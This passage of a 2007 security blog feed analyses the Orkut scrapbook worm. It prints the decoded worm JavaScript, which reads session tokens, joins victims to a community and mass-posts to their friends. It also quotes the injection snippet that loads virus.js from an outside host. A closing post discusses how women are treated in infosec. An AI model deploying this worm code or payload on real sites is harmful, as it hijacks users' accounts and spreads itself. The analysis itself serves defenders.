Orkut allows posting raw HTML, why the games? Why not just source virus.js and be done with it?&lt;br /&gt;&lt;br /&gt;So I did some experiments tonight. I tried the old script, alert &#39;hello I&#39;m an XSS&#39;, etc... and that doesn&#39;t work. It says my rich content was rejected, see &lt;a href=&quot;http://help.orkut.com/support/bin/answer.py?answer=66309&amp;amp;hl=en-US&quot;&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;And yet, I can paste in a much more complicated embed a flash movie expression, and that DOES work. Though, it made me fill in a CAPTCHA. I suspect that CAPTCHA is brand new as of tonight, otherwise I&#39;m not seeing how the worm worked so well.&lt;br /&gt;&lt;br /&gt;So the basic security challenge for Orkut here is that they want to allow some arbitrary HTML, but not others. As we have seen for many years with web-based email, that&#39;s a pretty hard problem to solve.&lt;br /&gt;&lt;br /&gt;So that&#39;s why the hoops to jump through. The worm author needed something that looked like a flash movie so that Orkut would allow posting it, but in fact allowed him to pull in arbitrary Javascript.&lt;br /&gt;&lt;br /&gt;This is where the &lt;a href=&quot;http://blog.deconcept.com/swfobject/&quot;&gt;SWFObject&lt;/a&gt; library comes into play. Its purpose in life seems to be to make it easier to embed Flash stuff and have it play properly. Orkut is nice enough to make this library available to every browser that loads the Scrapbook (and probably other) pages. They keep it at &lt;a href=&quot;http://img2.orkut.com/js/gen/scraps006.js&quot;&gt;http://img2.orkut.com/js/gen/scraps006.js&lt;/a&gt;, which they source for you.&lt;br /&gt;&lt;br /&gt;It looks to me like the worm author is able to build a SWFObject that includes the Javascript and causes it to be embedded in the Orkut page, thereby acting in the right context to have access to your Orkut cookies and all the good stuff that an AJAX worm needs. MySpace isn&#39;t alone in having all the good Web 2.0 worms anymore.&lt;br /&gt;&lt;br /&gt;Jeremy decoded and prettied up the obfuscated Javascript. You can see that code at the end. If you&#39;re watching carefully, you&#39;ll see this version has a different message as the scrap body than the one I originally posted. That means the person (presumably the worm author) who controls the virus.js download page has revved the file at least one. I have two different (obfuscated) versions. Since I believe Orkut was taking active measures to shut this thing down, I&#39;m guessing the author changes the text in case Orkut was keying off that.&lt;br /&gt;&lt;br /&gt;Like I mentioned before, if the CAPTCHA is new, that should essentially stop this thing from spreading. This kind of worm has interesting implications for social sites. If this gets to be really common, it means you&#39;ll be answering CAPTCHAs or something similar left and right.&lt;br /&gt;&lt;br /&gt;Also worth noting is that stopping the worm doesn&#39;t stop other interesting attacks. I was still able to post the same embed chunk of code to my own scrapbook as an experiment, I just had to answer the CAPTCHA. So a human could still put something there. If they can use it to run Javascript, that still leaves open attacks where they can steal your cookies.&lt;br /&gt;&lt;br /&gt;It looks like the immediate problem is over. I probably won&#39;t have a lot more technical to say on this one. I hope that the Jeremiahs and RSnakes of the world will jump in soon and tell me how the worm actually works.&lt;br /&gt;&lt;br /&gt;Decoded Javascript:&lt;br /&gt;&lt;br /&gt;var index=0;&lt;br /&gt;var POST=JSHDF[&quot;CGI.POST_TOKEN&quot;];&lt;br /&gt;var SIG=JSHDF[&quot;Page.signature.raw&quot;];&lt;br /&gt;&lt;br /&gt;function createXMLHttpRequest(){&lt;br /&gt;    try {&lt;br /&gt;        return new&lt;br /&gt;        ActiveXObject(&quot;Msxml2.XMLHTTP&quot;)&lt;br /&gt;    }&lt;br /&gt;    catch(e){&lt;br /&gt;    } ;&lt;br /&gt;&lt;br /&gt;    try {&lt;br /&gt;        return new ActiveXObject(&quot;Microsoft.XMLHTTP&quot;)&lt;br /&gt;    }&lt;br /&gt;    catch(e){&lt;br /&gt;    };&lt;br /&gt;&lt;br /&gt;    try {&lt;br /&gt;        return new XMLHttpRequest()&lt;br /&gt;    }&lt;br /&gt;    catch(e){&lt;br /&gt;    } ;&lt;br /&gt;    return null&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;function setCookie(name,value,expires,path,domain,secure){&lt;br /&gt;    var curCookie=name+&quot;=&quot;+escape(value)+(expires?&quot;;expires=&quot;+expires.toGMTString():&quot;&quot;)+(path?&quot;;path=&quot;+path:&quot;&quot;)+(domain?&quot;;domain=&quot;+domain:&quot;&quot;)+(secure?&quot;;secure&quot;:&quot;&quot;);&lt;br /&gt;    document.cookie=curCookie&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;function getCookie(name){&lt;br /&gt;    var dc=document.cookie;&lt;br /&gt;    var prefix=name+&quot;=&quot;;&lt;br /&gt;    var begin=dc.indexOf(&quot;;&quot;+prefix);&lt;br /&gt;    if(begin==-1){&lt;br /&gt;        begin=dc.indexOf(prefix);&lt;br /&gt;        if(begin!=0){&lt;br /&gt;            return false&lt;br /&gt;        }&lt;br /&gt;    } else {&lt;br /&gt;        begin+=2&lt;br /&gt;    };&lt;br /&gt;    var end=document.cookie.indexOf(&quot;;&quot;,begin);&lt;br /&gt;&lt;br /&gt;    if(end==-1){&lt;br /&gt;        end=dc.length&lt;br /&gt;    };&lt;br /&gt;    return unescape(dc.substring(begin+prefix.length,end))&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;function deleteCookie(name,path,domain){&lt;br /&gt;    if(getCookie(name)){      document.cookie=name+&quot;=&quot;+(path?&quot;;path=&quot;+path:&quot;&quot;)+(domain?&quot;;domain=&quot;+domain:&quot;&quot;)+&quot;;expires=Thu, 01-Jan-70 00:00:01 GMT&quot;;&lt;br /&gt;        history.go(0)&lt;br /&gt;        }&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;function loadFriends(){&lt;br /&gt;    var xml=createXMLHttpRequest();&lt;br /&gt;    if(xml){&lt;br /&gt;        xml.open(&quot;GET&quot;,&quot;http://www.orkut.com/Compose.aspx&quot;,true);&lt;br /&gt;        xml.send(null);&lt;br /&gt;        xml.onreadystatechange=function(){&lt;br /&gt;            if(xml.readyState==4){&lt;br /&gt;                if(xml.status==200){&lt;br /&gt;                    var xmlr=xml.responseText;&lt;br /&gt;                    var div=document.createElement(&quot;div&quot;);&lt;br /&gt;                    div.innerHTML=xmlr;&lt;br /&gt;                    var select=div.getElementsByTagName(&quot;select&quot;).item(0);&lt;br /&gt;                    if(select){&lt;br /&gt;                        select.removeChild(select.getElementsByTagName(&quot;option&quot;).item(0));&lt;br /&gt;                        select.setAttribute(&quot;id&quot;,&quot;selectedList&quot;);&lt;br /&gt;                        select.style.display=&quot;none&quot;;&lt;br /&gt;                        document.body.appendChild(select);&lt;br /&gt;                        sendScrap()&lt;br /&gt;                    }&lt;br /&gt;                } else {&lt;br /&gt;                    loadFriends()&lt;br /&gt;                }&lt;br /&gt;            }&lt;br /&gt;        };&lt;br /&gt;        xml.send(null)&lt;br /&gt;    }&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;function cmm_join(){&lt;br /&gt;    var send=&quot;POST_TOKEN=&quot;+encodeURIComponent(POST)+&quot;&amp;amp;signature=&quot;+encodeURIComponent(SIG)+&quot;&amp;amp;Action.join&quot;;&lt;br /&gt;    var  xml=createXMLHttpRequest();&lt;br /&gt;    xml.open(&#39;POST&#39;,&#39;http://www.orkut.com/CommunityJoin.aspx?cmm=&#39;+String.fromCharCode(52,52,48,48,49,56,49,56),true);&lt;br /&gt;    xml.setRequestHeader(&#39;Content-Type&#39;,&#39;application/x-www-form-urlencoded&#39;);&lt;br /&gt;    xml.send(send);&lt;br /&gt;    xml.onreadystatechange=function(){&lt;br /&gt;        if(xml.readyState==4){&lt;br /&gt;            if(xml.status!=200){&lt;br /&gt;                cmm_join();&lt;br /&gt;                return&lt;br /&gt;            };&lt;br /&gt;            loadFriends()&lt;br /&gt;        }&lt;br /&gt;    }&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;function sendScrap(){&lt;br /&gt;    if(index==document.getElementById(&quot;selectedList&quot;).length){&lt;br /&gt;        return&lt;br /&gt;    };&lt;br /&gt;    var scrapText=&quot;Boas festas de final de ano![silver]&quot;+new Date().getTime()+&quot;[/silver] &quot;;&lt;br /&gt;        var   send=&quot;Action.submit=1&amp;amp;POST_TOKEN=&quot;+encodeURIComponent(POST)+&quot;&amp;amp;scrapText=&quot;+encodeURIComponent(scrapText)+&quot;&amp;amp;signature=&quot;+encodeURIComponent(SIG)+&quot;&amp;amp;toUserId=&quot;+document.getElementById(&quot;selectedList&quot;).item(index).value;&lt;br /&gt;&lt;br /&gt;    var xml=createXMLHttpRequest();&lt;br /&gt;    xml.open(&quot;POST&quot;,&quot;http://www.orkut.com/Scrapbook.aspx&quot;,true);&lt;br /&gt;    xml.setRequestHeader(&quot;Content-Type&quot;,&quot;application/x-www-form-urlencoded;&quot;);&lt;br /&gt;    xml.send(send);&lt;br /&gt;    xml.onreadystatechange=function(){&lt;br /&gt;        if(xml.readyState==4){&lt;br /&gt;            index++;&lt;br /&gt;            var wDate=new Date;&lt;br /&gt;            wDate.setTime(wDate.getTime()+86400);&lt;br /&gt;            setCookie(&#39;wormdoorkut&#39;,index,wDate);&lt;br /&gt;            sendScrap()&lt;br /&gt;        }&lt;br /&gt;    }&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;if(!getCookie(&#39;wormdoorkut&#39;)){&lt;br /&gt;    var wDate=new Date;&lt;br /&gt;    wDate.setTime(wDate.getTime()+86400);&lt;br /&gt;    setCookie(&#39;wormdoorkut&#39;,&#39;0&#39;,wDate)&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;index=getCookie(&#39;wormdoorkut&#39;);&lt;br /&gt;cmm_join();</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/2381549055715809294/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment/fullpage/post/18579416/2381549055715809294' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/2381549055715809294'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/2381549055715809294'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/12/more-on-orkut-worm.html' title='More on Orkut worm'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-6114250041265022704</id><published>2007-12-18T21:02:00.000-08:00</published><updated>2007-12-19T00:23:41.681-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="malware"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><title type='text'>Orkut &quot;virus&quot;</title><content type='html'>More of a worm, actually.&lt;br /&gt;&lt;br /&gt;I had an email from Orkut this evening telling me I had a new scrapbook entry. I don&#39;t really use Orkut, but I signed up a while back, and friended a bunch of people I know. The scrapbook entry was a bit cryptic:&lt;br /&gt;&lt;pre wrap=&quot;&quot;&gt;&lt;/pre&gt;&lt;blockquote&gt;&lt;pre wrap=&quot;&quot;&gt;2008 vem ai... que ele comece mto bem para vc&lt;/pre&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;I still don&#39;t know exactly what it means, I&#39;m assuming it&#39;s Portuguese. Babelfish wasn&#39;t any help. I won&#39;t mention who I got it from, but I will admit that if you are friended by me on Orkut, I probably gave you a copy too. Fortunately, it looks like Orkut is actively and quickly deleting them, to stop the spread. I say completely unsarcastically, good job Orkut on the quick response!&lt;br /&gt;&lt;br /&gt;I haven&#39;t done any kind of through analysis yet, but it looks like a Javascript worm that kicks in via a Flash XSS? My HTML/Javascript/Flash-fu is pretty darn weak. This is what it looked like:&lt;br /&gt;&lt;br /&gt;&amp;lt;div id=&quot;flashDiv295378627&quot;&amp;gt;&amp;lt;embed type=&quot;application/x-shockwave-flash&quot; src=&quot;Scrapbook_files/LoL.html&quot; style=&quot;&quot; id=&quot;295378627&quot; name=&quot;295378627&quot; bgcolor=&quot;#FFFFFF&quot; quality=&quot;autohigh&quot; wmode=&quot;transparent&quot; allownetworking=&quot;internal&quot; allowscriptaccess=&quot;never&quot; height=&quot;1&quot; width=&quot;1&quot;&amp;gt;&amp;lt;/embed&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;script type=&quot;text/javascript&quot;&amp;gt; var flashWriter = new _SWFObject(&#39;http://www.orkut.com/LoL.aspx&#39;, &#39;295378627&#39;, &#39;1&#39;, &#39;1&#39;, &#39;9&#39;, &#39;#FFFFFF&#39;, &#39;autohigh&#39;, &#39;&#39;, &#39;&#39;, &#39;295378627&#39;); flashWriter._addParam(&#39;wmode&#39;, &#39;transparent&#39;); script=document.createElement(&#39;script&#39;);script.src=&#39;http://files.myopera.com/virusdoorkut/files/virus.js&#39;;document.getElementsByTagName(&#39;head&#39;)[0].appendChild(script);escape(&#39;&#39;); flashWriter._addParam(&#39;allowNetworking&#39;, &#39;internal&#39;); flashWriter._addParam(&#39;allowScriptAccess&#39;, &#39;never&#39;); flashWriter._setAttribute(&#39;style&#39;, &#39;&#39;); flashWriter._write(&#39;flashDiv295378627&#39;);&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;Looks like it joins you to an Orkut group, too:&lt;br /&gt;&lt;br /&gt;&lt;A HREF=&quot;http://www.orkut.com/Community.aspx?cmm=44001818&quot;&gt;Infectados pelo Vírus do Orkut&lt;/A&gt;.&lt;br /&gt;&lt;br /&gt;Owner of the group is a new-looking account named &quot;Virus do Orkut&quot;. Also, listed at the end of the virus.js file is this: author=&quot;Rodrigo Lacerda&quot;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/6114250041265022704/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment/fullpage/post/18579416/6114250041265022704' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6114250041265022704'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6114250041265022704'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/12/orkut-virus.html' title='Orkut &quot;virus&quot;'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-5181501474915835286</id><published>2007-07-19T10:36:00.000-07:00</published><updated>2008-05-03T14:21:45.021-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="secphil"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><title type='text'>The Ladies of Infosec</title><content type='html'>I was at an event not long ago, and the woman in the group was really pissed. In a room full of nothing but security geeks, someone asked her &quot;Oh, do you do security work?&quot;&lt;br /&gt;&lt;br /&gt;This didn&#39;t happen with any of the guys. The question they got was &quot;Where do you work?&quot;&lt;br /&gt;&lt;br /&gt;I was thinking about this today, and I realized that every woman I know who works in infosec has told me a similar story. That might be a slight exaggeration, but not much. Literally every one I can think of right now has told me one of these stories.&lt;br /&gt;&lt;br /&gt;They get things like:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Are you here with your boyfriend?&lt;/li&gt;&lt;li&gt;She used to be a man&lt;/li&gt;&lt;li&gt;Take your shirt off&lt;/li&gt;&lt;/ul&gt;Yes, sadly I have heard jerks yell out &quot;take your shirt off&quot; when a woman was trying to give a talk.&lt;br /&gt;&lt;br /&gt;How much do women hate this? You can read what &lt;a href=&quot;http://archives.neohapsis.com/archives/isn/2004-q2/0059.html&quot;&gt;Raven thinks&lt;/a&gt; about it.&lt;br /&gt;&lt;br /&gt;Let me tell you a little about this particular woman in question that reminded me of all this. She has worked in some of the most important software companies in the world, in the security groups. She has worked at at least two security companies that I know of. Pick just about any well-know security male, and they know who she is and they respect her work.&lt;br /&gt;&lt;br /&gt;If you&#39;ve been paying attention to the infosec world, you probably know who I&#39;m talking about. Keep it to yourself, because this particular woman is not the point.&lt;br /&gt;&lt;br /&gt;I have met a number of women at various conferences. I&#39;d look really foolish if I went around assuming they weren&#39;t attendees or didn&#39;t know what they were doing. I&#39;ve met a woman who works for the CIA. I&#39;ve met one who was a heavy-duty cryptographer. I&#39;ve met one who does BGP vulnerability research. Yes, the women are rare. Staring and asking stupid questions doesn&#39;t help improve that.&lt;br /&gt;&lt;br /&gt;Because of how hostile the infosec world is to women, the ones who manage to survive tend to really love what they do, and have worked very hard to stay in the field. This may mean that the woman you just met is better at security than 90% of the men. That probably includes you (and I&#39;ll happily concede that includes me.)&lt;br /&gt;&lt;br /&gt;Keep that in mind.</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/5181501474915835286/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment/fullpage/post/18579416/5181501474915835286' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5181501474915835286'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5181501474915835286'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/07/ladies-of-infosec.html' title='The Ladies of Infosec'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>9</thr:total></entry></feed>